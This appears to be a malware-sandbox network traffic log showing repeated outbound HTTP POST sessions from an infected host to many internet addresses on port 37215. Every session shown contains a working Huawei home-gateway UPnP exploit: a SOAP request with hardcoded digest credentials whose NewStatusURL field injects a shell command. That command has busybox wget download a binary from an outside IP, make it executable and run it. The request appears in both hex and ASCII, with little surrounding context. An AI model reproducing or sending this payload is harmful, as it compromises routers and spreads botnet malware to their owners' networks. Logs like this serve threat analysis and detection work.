                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2214192.168.2.1548640191.7.200.24537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.132422924 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2215192.168.2.1560078109.194.10.19937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.132515907 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2216192.168.2.1544830121.91.217.23837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.132544041 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2217192.168.2.153582831.159.253.2237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.132750988 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2218192.168.2.1552922186.251.40.20337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.132956028 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2219192.168.2.154086241.218.186.4037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.132960081 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2220192.168.2.1543938190.4.100.13737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.133025885 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2221192.168.2.1533522102.206.87.8937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.133153915 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2222192.168.2.1558434157.41.182.2337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.133194923 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2223192.168.2.154057845.241.203.7837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.133323908 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
